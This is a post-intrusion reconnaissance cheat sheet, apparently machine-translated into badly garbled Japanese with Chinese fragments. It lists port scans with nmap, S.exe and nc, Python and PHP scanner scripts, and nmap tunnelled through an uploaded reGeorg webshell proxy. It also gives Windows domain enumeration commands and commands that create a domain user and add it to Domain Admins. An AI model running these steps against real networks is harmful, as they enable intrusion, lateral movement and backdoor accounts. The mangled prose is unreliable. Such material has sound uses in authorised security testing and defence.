ポートスキャン
nmapのは、ネットワークに入った後、外部のネットワークスキャン動作は、基本的には代わりの一連の同じ、ただ一つのIP IPアドレスであり、コマンドライン、コースのグラフィカルインターフェース、znmapに基づいて、クロスプラットフォームの情報収集ツールでありますスキャン
NAMP
1. nmapのは、ターゲットマシンに直接アップロード
どのように多くのホストオンラインネットワーク内の1.1スキャニング
nmap.exe -sP 内网地址段或单个ip
ネットワークアドレス:192.168.xxの172.16.xx -172.31.xx 10.xxx
マシンのスキャン2.オンラインポート
nmap.exe ip
2. Doがプロキシ経由でnmapのリモートアップロードを使用しません
1.アップロードregeorg DMZネットワークへ
2.エージェントがregeorgを介してネットワーク内のマシンをDMZ
python reGeorgSocksProxy.py -u (regeorg上传地址/tunnel.aspx)
3.変更/etc/proxychains.confプロフィール
socks5 127.0.0.1 8888
の形態の薬剤を用いて4 nmapのポート・スキャン
proxychains nmap -sT -Pn -p 80,445,3389 10.1.1.1
sのスキャナ
S.exe、このプログラムは、Windowsの下で、高速スキャナであります
1.まずS.exeアップロード
2.
2.1 TCPポートは、このセクションIP 218.80.12.123に218.80.12.1の80スキャン、最大512の同時スレッドであります
S.exe TCP 218.80.12.1 218.80.12.123 80 512
218.80.12.1 218.80.12.123のIPを、このポートのセクション21と5631スキャン2.2 TCPは、最大同時スレッドは512であり、ディスプレイバナー
S.exe TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
2.3 TCPポートスキャン1-200 218.80.12.1このIPの218.80.12.12に、最大同時実行スレッド512
S.exe TCP 218.80.12.1 218.80.12.12 1-200 512
最大同時スレッドで218.80.12.7この1-200 IPポートをスキャン2.4 TCPは、結果がResult.txt Sがジャストスキャンに位置しており、お使いのスキャナの上のフォルダにスキャンした後、Result.txtを書かされ、512でありますその中のすべてのもの
S.exe TCP 218.80.12.7 1-200 512 /save
2.5 SYNは結果がResult.txtはそれでだけでスキャンすべてSはに位置しているスキャナ、上のフォルダにスキャンした後、Result.txt書き込まれ、この中に1〜65535のポート218.80.12.7 IPをスキャン
S.exe SYN 218.80.12.7 1-65535 /Save
この218.80.12.1 218.80.12.255のIPセグメントにおける2.6 SYNスキャンポート21は、結果がResult.txtに位置しているSスキャナ、単にスキャンすべてのフォルダにあるスキャンした後、Result.tx書かれています内側に
S.exe SYN 218.80.12.1 218.80.12.255 21 /Save
NC
NCネットワークがスキャンポートに使用することができますツールです。
使用します。
80から445 IPポートのスキャン
nc -nvv -w2 -z ip 80-445
スクリプトを記述するので、
PHP、PythonやPerlの、ルビー、ジャワ、Cおよび他のプログラムがポートスキャンを行うために使用することができますが、また、スキャンを実行するためにバットやシェルスクリプトを使用することができます
パイソン
#!/usr/bin/env python
import socket
def get_ip_status(ip,port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip,port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip,port))
finally:
server.close()
if __name__ == '__main__':
host = '10.0.0.11'
for port in range(20,100):
get_ip_status(host,port)
PHP
$arr = [80,8080,3306];
foreach ($arr as $port) {
$fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1);
if (!$fp) {
echo $port." closed\n";
}else{
echo $port." Opend\n";
}
}
一般的な情報収集コマンド
1.現在のグループのコンピュータ名の取得
、使用条件を:サーバーおよびコンピュータブラウザサービスがオンになっています
net view
現在のすべてのドメインを取得します。2.
net view /domain
ワークグループ内のワークグループのコンピュータの一覧を取得します3。
net view /domain:hacker
コンピュータの名に対応するIPアドレスを取得します。4.
ping -n 1 -4 dc
コンピュータは多くの時間に名前を付ける場合は、バットバッチのping IPアクセスを使用することができます
@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)
)
)
それらは、ドメインコントローラのクエリに送信されると、以下のコマンドを実行し、マシンの浸透がドメインのユーザー権限ではない場合、それはエラーになります
ユーザーのドメインを確認してください。5.
dsquery user 或者 net user /domain
Domain Usersグループをチェック6.
net group /domain
7.クエリのドメイン管理者
net group "Domain Admins" /domain
他のドメイングループの内容を表示するには、別のドメイン名で管理者グループを交換してください
ドメインユーザーを追加します。8.
一般的なドメインユーザーを追加します
net user lp 123.com /add /domain
ドメイン管理者に通常のドメインユーザー
net group "Domain Admins" lp /add /domain
ビューのユーザー情報
net user lp /domain
9.現在のコンピュータ名、フルネーム、ユーザ名、システムバージョン、ワークステーションフィールド、着陸場
net config workstation
10.クエリのすべてのコンピュータ名
dsquery computer
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
11.netコマンドは、
ローカルディスク(高い特権ユーザ)にマッピング
net use z: \\计算机名或者ip\盘符或者分区
共有ビュー(以下$の隠し共有を参照してください)
net view \\ip
(d)に、アプリの$という共有を開きます。\設定
net share app$=d:\config
12.トレースルート
tracert 公网dns地址
13.位置決め制御ドメイン
名は、タイムドメインとドメインサーバを参照してください
net time /domain
クエリドメインコントローラ
net group "Domain Controllers" /domain
IPCONFIGで構成されたDNSアドレスを探します
ipconfig /all 拿到dns地址
ping -a dns地址 返回计算机名
14.dsqueryいくつかの使用
すべてのマシンのドメイン名のリストへ
dsquery computer domain root -limit 65535 && net group "domain computers" /domain
ドメイン名内のすべてのユーザーを一覧表示
dsquery user domain root -limit 65535 && net user /domain
ネットワークセグメンテーションは、ドメインをリストされています
dsquery subnet
グループは、ドメインにリストされています
dsquery group && net group /domain
リストドメイン内の組織単位
dsquery ou
ドメインのドメイン制御サーバをリスト
dsquery server && net time /domain
上場ドメイン管理アカウント
net group "domain admins" /domain